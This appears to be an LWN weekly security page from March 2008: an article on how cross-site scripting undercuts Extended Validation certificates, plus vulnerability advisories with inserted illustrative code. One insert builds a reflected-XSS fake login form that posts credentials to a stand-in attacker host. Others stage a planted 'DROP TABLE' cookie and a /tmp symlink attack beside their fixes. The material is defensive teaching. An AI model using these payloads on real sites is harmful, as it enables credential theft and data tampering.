
Security

Extended Validation certificates and cross-site scripting

By Jake Edge
March 12, 2008

Cross-site scripting (XSS) is a frequent topic on security forums because it is a common web application flaw that can lead to a variety of unpleasant surprises. One of the more frequently seen abuses of an XSS flaw is in aid of a phishing attack. With the advent of Extended Validation (EV) certificates, coupled with the accompanying browser UI changes, some XSS attacks will become much more powerful.

By now, most users are familiar with SSL certificates, which are used to authenticate one or both sides of an HTTPS connection to the other. EV certificates are a step up from a more pedestrian SSL certificate as the recipient must undergo more scrutiny from the certificate authority (CA) before being granted one. We covered EV certificates in more detail in November 2006, but they are just now starting to be installed more widely.

Netcraft reported the problem a few weeks ago with regard to sourceforge.net. Sourceforge is one of the 4,000 or so sites with an EV certificate, but it also has an XSS problem. So anyone exploiting the site's XSS flaw now gets the benefit of the higher trust that is supposed to be embodied in an EV certificate.

Browser vendors are being encouraged to highlight the EV certificates in their UI so as to give users more confidence in those sites. The most recent Firefox 3 betas as well as IE7 are highlighting the site name in green in the address bar to denote this higher trust. Unfortunately, the extra validation does not extend to testing the site for XSS flaws, which could leave users easily fooled.

A phishing attack could use an XSS flaw in a search box or error message, for example, to inject content into a site's pages. That content really comes from the XSS attack, but it would appear under the "green means go" address bar of the EV certificate-protected site. It could include a login form that sends the credentials elsewhere, or cookie-stealing script for session hijacking. For any site with sensitive information, XSS attacks are already a problem; EV certificates just add another mechanism for exploiting the user's trust.
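The search-box scenario above, as an added example that is not part of the article: a reflected search handler that echoes the query verbatim, beside one that escapes it for an HTML text context, both fed the same crafted link. The site name, the attacker's collector host and the page skeleton are assumptions made up for the illustration.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed names for this illustration: the EV-protected site and the host
# that collects phished credentials. Neither appears in the article.
SITE_HOST = "www.example-bank.test"
ATTACKER_HOST = "collector.attacker.test"

# Constructed page skeleton for a search-results page that reflects the query.
PAGE_TEMPLATE = (
    "<!doctype html><html><body>"
    "<h1>Search results</h1>"
    "<p>You searched for: {query}</p>"
    "</body></html>"
)


def render_search_vulnerable(query: str) -> str:
    """Reflect the search term verbatim: the XSS flaw."""
    return PAGE_TEMPLATE.format(query=query)


def render_search_fixed(query: str) -> str:
    """Escape the term for an HTML text context before reflecting it.

    html.escape turns < > & " ' into entities, so injected markup is
    displayed as text instead of being parsed as HTML.
    """
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True))


def phishing_payload() -> str:
    """A fake login form whose action points at the attacker's host.

    When reflected by the vulnerable handler it renders inside the
    legitimate page, under the site's own (green) address bar.
    """
    return (
        '<form action="https://' + ATTACKER_HOST + '/login" method="post">'
        "Your session has expired. Please sign in again:<br>"
        '<input name="user"><input name="pass" type="password">'
        '<input type="submit" value="Sign in"></form>'
    )


def phishing_url() -> str:
    """The link a phisher would mail out; the browser shows SITE_HOST."""
    return "https://" + SITE_HOST + "/search?" + urlencode({"q": phishing_payload()})


def handle_request(url: str, fixed: bool) -> str:
    """Simulate the search endpoint receiving the crafted link."""
    query = parse_qs(urlsplit(url).query).get("q", [""])[0]
    render = render_search_fixed if fixed else render_search_vulnerable
    return render(query)


def page_posts_credentials_to(page: str, host: str) -> bool:
    """Does the rendered page contain a live form posting to `host`?"""
    return '<form action="https://' + host + '/' in page


if __name__ == "__main__":
    url = phishing_url()
    for fixed in (False, True):
        page = handle_request(url, fixed)
        print("fixed" if fixed else "vulnerable",
              "-> credentials go to attacker:",
              page_posts_credentials_to(page, ATTACKER_HOST))
```

The only difference between the two handlers is the `html.escape` call, which is the whole fix for this context; attribute and JavaScript contexts need their own encoding, and nothing about the TLS certificate enters into it either way.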

Much like the padlock icon that appeared many years ago to denote a "secure" (really, just encrypted) connection, this new green address bar indicator is somewhat difficult to explain. Based on the vetting process for EV certificates, there should be a real entity behind an EV certificate—or at least there was one at the time of issuance—but it is by no means an endorsement of the security of everything on a web page that has one. It is, like the original padlock, more nuanced than that.

Unfortunately, users are not good at security nuances. They want yes or no answers to "Is this site safe?"; that answer is nearly always "maybe" or perhaps "probably". At one time, the padlock icon was seen as a "yes" answer; now the green address bar may take its place. Somehow users need to be taught to look beyond simple answers and websites need to clean up their act so that their users are not scammed.

The number of sites with XSS problems is staggering (a look at xssed.com is instructive) and new ones crop up all the time. In many ways, XSS is an attack against users rather than directly against a site. This may make it less of a priority to fix than a direct attack, like SQL injection, might be. That is very unfortunate for those sites' users, especially if the site has a shiny new EV certificate.

Comments (10 posted)

Removing the updated vulnerability listings

The LWN Security page has lots of useful information, but sometimes it seems to stretch on for a long ways. A lot of that length is contained in the "Updated vulnerabilities" section and we are starting to wonder if that really adds that much to the page. It is collected automatically from our daily security updates, so removing it won't help us kick out the weekly edition any faster, but it might make reading the page, especially in the "one big page" format, somewhat easier. If we removed that section, the information would still appear in the daily summaries, of course, and be available by searching our database. Before we do that, though, we'd like to hear from our readers regarding their thoughts on the matter. Please comment if you have thoughts one way or the other.

Comments (46 posted)

New vulnerabilities

java: multiple vulnerabilities

Package(s):java-1.5.0-sun CVE #(s):CVE-2008-1185 CVE-2008-1186 CVE-2008-1187 CVE-2008-1188 CVE-2008-1189 CVE-2008-1190 CVE-2008-1191 CVE-2008-1192 CVE-2008-1193 CVE-2008-1194 CVE-2008-1195 CVE-2008-1196
Created:March 7, 2008 Updated:July 16, 2008
Description: From the Red Hat advisory:

Flaws in the JRE allowed an untrusted application or applet to elevate its privileges. This could be exploited by a remote attacker to access local files or execute local applications accessible to the user running the JRE. (CVE-2008-1185, CVE-2008-1186)

A flaw was found in the Java XSLT processing classes. An untrusted application or applet could cause a denial of service, or execute arbitrary code with the permissions of the user running the JRE. (CVE-2008-1187)

Several buffer overflow flaws were found in Java Web Start (JWS). An untrusted JNLP application could access local files or execute local applications accessible to the user running the JRE. (CVE-2008-1188, CVE-2008-1189, CVE-2008-1190, CVE-2008-1191, CVE-2008-1196)

A flaw was found in the Java Plug-in. A remote attacker could bypass the same origin policy, executing arbitrary code with the permissions of the user running the JRE. (CVE-2008-1192)

A flaw was found in the JRE image parsing libraries. An untrusted application or applet could cause a denial of service, or possibly execute arbitrary code with the permissions of the user running the JRE. (CVE-2008-1193)

A flaw was found in the JRE color management library. An untrusted application or applet could trigger a denial of service (JVM crash). (CVE-2008-1194)

The JRE allowed untrusted JavaScript code to create local network connections by the use of Java APIs. A remote attacker could use these flaws to access local network services. (CVE-2008-1195)

Alerts:
Red Hat RHSA-2008:0555-01 java-1.4.2-ibm 2008-07-14
Red Hat RHSA-2008:0267-01 java-1.6.0-ibm 2008-05-19
Red Hat RHSA-2008:0244-01 java-1.5.0-bea 2008-04-28
Red Hat RHSA-2008:0243-01 java-1.4.2-bea 2008-04-28
rPath rPSA-2008-0128-2 firefox 2008-03-27
Red Hat RHSA-2008:0245-01 java-1.6.0-bea 2008-04-28
SuSE SUSE-SA:2008:025 IBMJava2,IBMJava5,java-1_4_2-ibm,java-1_5_0-ibm 2008-04-25
Gentoo 200804-20 sun-jre, sun-jdk 2008-04-17
SuSE SUSE-SA:2008:019 MozillaFirefox 2008-04-04
Red Hat RHSA-2008:0210-01 java-1.5.0-ibm 2008-04-03
SuSE SUSE-SA:2008:018 Sun Java 2008-04-02
Mandriva MDVSA-2008:080 mozilla-firefox 2008-03-28
rPath rPSA-2008-0128-1 firefox 2008-03-27
Ubuntu USN-592-1 firefox 2008-03-26
Red Hat RHSA-2008:0186-01 java-1.5.0-sun 2008-03-06

Comments (none posted)

joomla: multiple vulnerabilities

Package(s):joomla CVE #(s):CVE-2007-6642 CVE-2007-6643 CVE-2007-6644 CVE-2007-6645
Created:March 6, 2008 Updated:March 12, 2008
Description: Joomla, a PHP-based content management system, has the following vulnerabilities: multiple cross-site request forgery vulnerabilities; one cross-site scripting vulnerability; a flaw that allows remote authenticated administrators to promote arbitrary users to the administrator group, violating the intended security model; and a registered-user privilege escalation vulnerability.
Alerts:
Mandriva MDVSA-2008:060 joomla 2008-03-05

Comments (none posted)

kronolith: privilege escalation and more?

Package(s):kronolith CVE #(s):
Created:March 10, 2008 Updated:March 12, 2008
Description:

The Fedora advisory is light on details:

Fix privilege escalation in Horde API. Fix missing ownership validation on share changes.

Alerts:
Fedora FEDORA-2008-2221 kronolith 2008-03-07
Fedora FEDORA-2008-2212 kronolith 2008-03-06

Comments (none posted)

libnet-dns-perl: denial of service

Package(s):libnet-dns-perl CVE #(s):CVE-2007-6341 CVE-2007-3409
Created:March 12, 2008 Updated:March 27, 2008
Description: The libnet-dns-perl package can crash when decoding malformed A records, creating a denial of service vulnerability. The domain name expander can also be sent into an infinite loop, another denial of service problem.
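The infinite-loop case above, as an added example that is not Net::DNS code and does not reproduce its exact bug: an RFC 1035 name expander that follows compression pointers but rejects a pointer that points at or beyond its own position, or revisits a pointer it has already followed. The sample packets are constructed here; a pointer pointing at itself is the simplest loop, and the second packet shows why "pointers must go backwards" alone is not enough.

```python
import struct
from typing import Tuple

# Bound on pointer hops as a final backstop; real names need only a few.
MAX_POINTER_HOPS = 64


class MalformedName(ValueError):
    """Raised instead of looping or reading past the packet."""


def expand_name(packet: bytes, offset: int) -> Tuple[str, int]:
    """Decode an RFC 1035 domain name that starts at `offset`.

    Returns (dotted name, offset just past the name as it appears at
    `offset`), so the caller can keep parsing the record. Compression
    pointers are followed, but a pointer that points at or beyond its
    own position, or a position already visited, is rejected: that is
    the shape of the loop that hangs a naive expander.
    """
    labels = []
    pos = offset
    end_pos = None        # where the caller resumes; fixed by the first pointer
    visited = set()       # positions of pointers already followed
    hops = 0
    while True:
        if pos >= len(packet):
            raise MalformedName("name runs past end of packet")
        length = packet[pos]
        if length == 0:                      # root label terminates the name
            pos += 1
            break
        if length & 0xC0 == 0xC0:            # two-byte compression pointer
            if pos + 1 >= len(packet):
                raise MalformedName("truncated compression pointer")
            target = struct.unpack("!H", packet[pos:pos + 2])[0] & 0x3FFF
            if end_pos is None:
                end_pos = pos + 2
            if target >= pos or pos in visited:
                raise MalformedName("compression pointer loop at offset %d" % pos)
            visited.add(pos)
            hops += 1
            if hops > MAX_POINTER_HOPS:
                raise MalformedName("too many compression pointers")
            pos = target
            continue
        if length & 0xC0:                    # 0x40/0x80 label types are reserved
            raise MalformedName("reserved label type")
        if pos + 1 + length > len(packet):
            raise MalformedName("label runs past end of packet")
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    if end_pos is None:
        end_pos = pos
    return ".".join(labels) + ".", end_pos


def is_malformed(packet: bytes, offset: int) -> bool:
    """True if expand_name rejects the name (and therefore did not hang)."""
    try:
        expand_name(packet, offset)
    except MalformedName:
        return True
    return False


def encode_name(name: str) -> bytes:
    """Uncompressed wire encoding, used only to build the sample packets."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


# Constructed sample packets (12-byte zeroed header, then names).
# GOOD: "www.example.com" at offset 12, then "mail" plus a pointer to
# offset 16, where "example.com" begins.
GOOD_PACKET = b"\x00" * 12 + encode_name("www.example.com") + b"\x04mail\xC0\x10"
# SELF_LOOP: a pointer at offset 12 that points to offset 12.
SELF_LOOP_PACKET = b"\x00" * 12 + b"\xC0\x0C"
# BACKWARD_LOOP: label "a" at 12, then a pointer at 14 back to 12, so a
# decoder that only checks "pointer goes backwards" still cycles forever.
BACKWARD_LOOP_PACKET = b"\x00" * 12 + b"\x01a\xC0\x0C"

if __name__ == "__main__":
    print(expand_name(GOOD_PACKET, 12))
    print(expand_name(GOOD_PACKET, 29))
    for pkt in (SELF_LOOP_PACKET, BACKWARD_LOOP_PACKET):
        print("rejected:", is_malformed(pkt, 12))
```

The hop counter is deliberately redundant with the visited set; bounding the work a parser can do on one record is cheap insurance against the next malformed-input case that the explicit checks do not anticipate.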
Alerts:
Ubuntu USN-594-1 libnet-dns-perl 2008-03-26
Mandriva MDVSA-2008:073 perl-Net-DNS 2008-03-20
Debian DSA-1515-1 libnet-dns-perl 2008-03-11

Comments (none posted)

lighttpd: cgi source disclosure

Package(s):lighttpd CVE #(s):CVE-2008-1111
Created:March 7, 2008 Updated:April 4, 2008
Description: lighttpd before 1.4.18 is vulnerable to CGI source disclosure.
Alerts:
SuSE SUSE-SR:2008:008 wireshark, otrs, xine, xgl, silc-toolkit, lighttpd, tk 2008-04-04
Fedora FEDORA-2008-2262 lighttpd 2008-03-06
rPath rPSA-2008-0106-1 lighttpd 2008-03-12
Debian DSA-1513-1 lighttpd 2008-03-06
Fedora FEDORA-2008-2278 lighttpd 2008-03-06

Comments (none posted)

MediaWiki: cross-site scripting

Package(s):mediawiki CVE #(s):CVE-2008-0460
Created:March 7, 2008 Updated:December 24, 2008
Description: From the CVE entry: Cross-site scripting (XSS) vulnerability in api.php in (1) MediaWiki 1.11 through 1.11.0rc1, 1.10 through 1.10.2, 1.9 through 1.9.4, and 1.8; and (2) the BotQuery extension for MediaWiki 1.7 and earlier; when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Alerts:
Fedora FEDORA-2008-11688 mediawiki 2008-12-24
Fedora FEDORA-2008-2288 mediawiki 2008-03-06
Fedora FEDORA-2008-2245 mediawiki 2008-03-06

Comments (none posted)

moin: multiple vulnerabilities

Package(s):moin CVE #(s):CVE-2007-2637 CVE-2008-0782 CVE-2008-1098 CVE-2008-1099
Created:March 10, 2008 Updated:January 30, 2009
Description:

From the Debian advisory:

CVE-2007-2637: Access control lists for calendars and includes were insufficiently enforced, which could lead to information disclosure.

CVE-2008-0782: A directory traversal vulnerability in cookie handling could lead to local denial of service by overwriting files.

CVE-2008-1098: Cross-site-scripting vulnerabilities have been discovered in the GUI editor formatter and the code to delete pages.

CVE-2008-1099: The macro code validates access control lists insufficiently, which could lead to information disclosure.

Alerts:
Ubuntu USN-716-1 moin 2009-01-30
Fedora FEDORA-2008-3328 moin 2008-04-29
Fedora FEDORA-2008-3301 moin 2008-04-29
Gentoo 200803-27 moinmoin 2008-03-18
Debian DSA-1514-1 moin 2008-03-09

Comments (none posted)

nx: multiple vulnerabilities

Package(s):nx CVE #(s):
Created:March 7, 2008 Updated:March 12, 2008
Description: There are multiple vulnerabilities in nx before 3.1.0.
Alerts:
Fedora FEDORA-2008-2258 nx 2008-03-06

Comments (none posted)

pdflib: multiple buffer overflows

Package(s):pdflib CVE #(s):CVE-2007-6561
Created:March 11, 2008 Updated:March 12, 2008
Description: From the CVE entry: Multiple stack-based buffer overflows in PDFLib allow user-assisted remote attackers to execute arbitrary code via a long filename argument to the PDF_load_image function that results in an overflow in the pdc_fsearch_fopen function, and possibly other vectors.
Alerts:
Gentoo 200803-17 pdflib 2008-03-10

Comments (none posted)

phpmyadmin: sql injection

Package(s):phpmyadmin CVE #(s):CVE-2008-1149
Created:March 10, 2008 Updated:February 2, 2009
Description:

From the Gentoo advisory:

Richard Cunningham reported that phpMyAdmin uses the $_REQUEST variable instead of $_GET and $_POST as a source for its parameters.

An attacker could entice a user to visit a malicious web application that sets an "sql_query" cookie and is hosted on the same domain as phpMyAdmin, and thereby conduct SQL injection attacks with the privileges of the user authenticating in phpMyAdmin afterwards.
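The mechanism behind the advisory, as an added example that is not phpMyAdmin code: a model of how PHP assembles $_REQUEST from GET, POST and COOKIE, with a later source overwriting an earlier one, so a cookie planted by a sibling application on the same domain silently replaces the statement the user actually submitted. The merge order (assumed here to follow the "EGPCS" default of the PHP 5.2 era) and the constructed request are assumptions for the illustration.

```python
from typing import Dict, Optional


def build_request(get: Dict[str, str], post: Dict[str, str], cookie: Dict[str, str],
                  order: str = "GPC") -> Dict[str, str]:
    """Model of $_REQUEST: merge the sources in `order`, later ones win.

    Assumption: PHP's variables_order default "EGPCS" (GET, POST, COOKIE
    for the request part), so a cookie overrides a POST parameter of the
    same name. The order string is exposed so the effect can be compared.
    """
    sources = {"G": get, "P": post, "C": cookie}
    merged: Dict[str, str] = {}
    for letter in order:
        merged.update(sources[letter])
    return merged


def sql_query_vulnerable(get, post, cookie) -> Optional[str]:
    """Read sql_query the way the advisory describes: from $_REQUEST."""
    return build_request(get, post, cookie).get("sql_query")


def sql_query_fixed(get, post, cookie) -> Optional[str]:
    """Read sql_query only from the request body or query string.

    A cookie can no longer supply the statement; a cross-site page on the
    same domain has no way to put a value into POST or GET of a request
    the user makes to phpMyAdmin themselves.
    """
    if "sql_query" in post:
        return post["sql_query"]
    return get.get("sql_query")


# Constructed scenario: the user submits a harmless query via POST, but a
# malicious page on the same domain earlier set a sql_query cookie.
USER_GET: Dict[str, str] = {}
USER_POST = {"sql_query": "SELECT 1"}
PLANTED_COOKIE = {"sql_query": "DROP TABLE accounts", "pma_session": "abc123"}


def scenario() -> Dict[str, Optional[str]]:
    """What each code path would hand to the database for the same request."""
    return {
        "vulnerable": sql_query_vulnerable(USER_GET, USER_POST, PLANTED_COOKIE),
        "fixed": sql_query_fixed(USER_GET, USER_POST, PLANTED_COOKIE),
        # With cookies excluded from the merge the same bug cannot happen,
        # which is what later PHP configurations (request_order = "GP") do.
        "merged_without_cookies": build_request(
            USER_GET, USER_POST, PLANTED_COOKIE, order="GP").get("sql_query"),
    }


if __name__ == "__main__":
    for path, query in scenario().items():
        print("%-24s %s" % (path + ":", query))
```

Restricting the source is the direct fix; the attack still has the shape of a cross-site request forgery, so a per-session token on state-changing requests is the usual second layer.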

Alerts:
SuSE SUSE-SR:2008:026 libxml2, phpMyAdmin, lighttpd, OpenOffice_org, imp, clamav, acroread, htop, cups 2008-11-24
SuSE SUSE-SR:2009:003 boinc-client, xrdp, phpMyAdmin, libnasl, moodle, net-snmp, audiofile, xterm, amarok, libpng, sudo, avahi 2009-02-02
Mandriva MDVSA-2008:131 phpMyAdmin 2008-07-04
Debian DSA-1557-1 phpmyadmin 2008-04-24
Gentoo 200803-15 phpmyadmin 2008-03-09

Comments (none posted)

SynCE: several vulnerabilities

Package(s):synce-sync-engine CVE #(s):CVE-2007-6703 CVE-2008-1136
Created:March 7, 2008 Updated:March 12, 2008
Description: Red Hat bug #436023: "Unspecified vulnerability in vdccm before 0.10.1 in SynCE (SynCE-dccm) might allow attackers to cause a denial of service via unspecified vectors."

Red Hat bug #436024: "The Utils::runScripts function in src/utils.cpp in vdccm 0.92 through 0.10.0 in SynCE (SynCE-dccm) allows remote attackers to execute arbitrary commands via shell metacharacters in a certain string to TCP port 5679."

Alerts:
Fedora FEDORA-2008-0680 pywbxml 2008-03-06
Fedora FEDORA-2008-0680 vdccm 2008-03-06
Fedora FEDORA-2008-0680 librapi 2008-03-06
Fedora FEDORA-2008-0680 libsynce 2008-03-06
Fedora FEDORA-2008-0680 synce-gnome 2008-03-06
Fedora FEDORA-2008-0680 synce-gnomevfs 2008-03-06
Fedora FEDORA-2008-0680 odccm 2008-03-06
Fedora FEDORA-2008-0680 librra 2008-03-06
Fedora FEDORA-2008-0680 synce-serial 2008-03-06
Fedora FEDORA-2008-0680 wbxml2 2008-03-06
Fedora FEDORA-2008-0680 synce-kpm 2008-03-06
Fedora FEDORA-2008-0680 synce-sync-engine 2008-03-06

Comments (none posted)

vlc: multiple vulnerabilities

Package(s):vlc CVE #(s):CVE-2007-6681 CVE-2007-6682 CVE-2007-6683 CVE-2007-6684 CVE-2008-0295 CVE-2008-0296 CVE-2008-0984
Created:March 10, 2008 Updated:April 23, 2008
Description:

From the Gentoo advisory:

* Michal Luczaj and Luigi Auriemma reported that VLC contains boundary errors when handling subtitles in the ParseMicroDvd(), ParseSSA(), and ParseVplayer() functions in the modules/demux/subtitle.c file, allowing for a stack-based buffer overflow (CVE-2007-6681).

* The web interface listening on port 8080/tcp contains a format string error in the httpd_FileCallBack() function in the network/httpd.c file (CVE-2007-6682).

* The browser plugin possibly contains an argument injection vulnerability (CVE-2007-6683).

* The RTSP module triggers a NULL pointer dereference when processing a request without a "Transport" parameter (CVE-2007-6684).

* Luigi Auriemma and Remi Denis-Courmont found a boundary error in the modules/access/rtsp/real_sdpplin.c file when processing SDP data for RTSP sessions (CVE-2008-0295) and a vulnerability in the libaccess_realrtsp plugin (CVE-2008-0296), possibly resulting in a heap-based buffer overflow.

* Felipe Manzano and Anibal Sacco (Core Security Technologies) discovered an arbitrary memory overwrite vulnerability in VLC's MPEG-4 file format parser (CVE-2008-0984).

Alerts:
Debian DSA-1543-1 vlc 2008-04-09
Gentoo 200803-13 vlc 2008-03-07

Comments (none posted)

vobcopy: insecure temp file

Package(s):vobcopy CVE #(s):CVE-2007-5718
Created:March 6, 2008 Updated:March 12, 2008
Description: From the Gentoo alert: Joey Hess reported that vobcopy appends data to the file "/tmp/vobcopy.bla" in an insecure manner. A local attacker could exploit this vulnerability to conduct symlink attacks and append data to arbitrary files with the privileges of the user running Vobcopy.
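The symlink attack described above, as an added example that is not vobcopy's code: a scratch directory stands in for /tmp, a "victim" file for whatever the attacker wants appended to, and a symlink named vobcopy.bla for the trap. The insecure append writes through the link; the safe variant opens with O_NOFOLLOW and checks that it got a regular file it owns, and the better fix creates a uniquely named file with mkstemp. The victim file name and contents are constructed for the demonstration.

```python
import errno
import os
import shutil
import stat
import tempfile

TRAP_NAME = "vobcopy.bla"   # the fixed file name from the advisory


def append_insecure(path: str, data: str) -> None:
    """Open for append through whatever `path` is: follows a planted symlink."""
    with open(path, "a") as f:
        f.write(data)


def append_safe(path: str, data: str) -> None:
    """Append without following symlinks and only to a file we own.

    O_NOFOLLOW makes open() fail (ELOOP on Linux) if the last path
    component is a symlink; the fstat check rejects a pre-existing file
    owned by someone else and anything that is not a regular file.
    """
    fd = os.open(path, os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW, 0o600)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid():
            raise PermissionError(errno.EPERM, "not a regular file we own", path)
        os.write(fd, data.encode())
    finally:
        os.close(fd)


def private_logfile(directory: str) -> str:
    """The better fix: a uniquely named file created atomically with mode 0600."""
    fd, path = tempfile.mkstemp(prefix="vobcopy.", dir=directory)
    os.close(fd)
    return path


def demo() -> dict:
    """Stage the symlink attack in a scratch directory and report the outcome."""
    root = tempfile.mkdtemp()
    try:
        victim = os.path.join(root, "victim_config")   # constructed target file
        with open(victim, "w") as f:
            f.write("original\n")
        trap = os.path.join(root, TRAP_NAME)
        os.symlink(victim, trap)                        # the attacker's symlink

        append_insecure(trap, "injected\n")
        with open(victim) as f:
            after_insecure = f.read()

        try:
            append_safe(trap, "injected again\n")
            safe_refused = False
        except OSError:
            safe_refused = True
        with open(victim) as f:
            after_safe = f.read()

        log = private_logfile(root)
        log_mode = stat.S_IMODE(os.stat(log).st_mode)
        return {
            "victim_after_insecure": after_insecure,
            "safe_refused": safe_refused,
            "victim_after_safe": after_safe,
            "private_log_mode": log_mode,
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-22s %r" % (key + ":", value))
```

A fixed name in a world-writable directory is the root problem; O_NOFOLLOW closes the symlink variant, but an attacker who pre-creates a regular file of that name still controls what the program reads back later, which is why mkstemp (or a directory only the user can write to) is the fix rather than the check.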
Alerts:
Gentoo 200803-11 vobcopy 2008-03-05

Comments (none posted)

Page editor: Jake Edge


Copyright © 2008, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds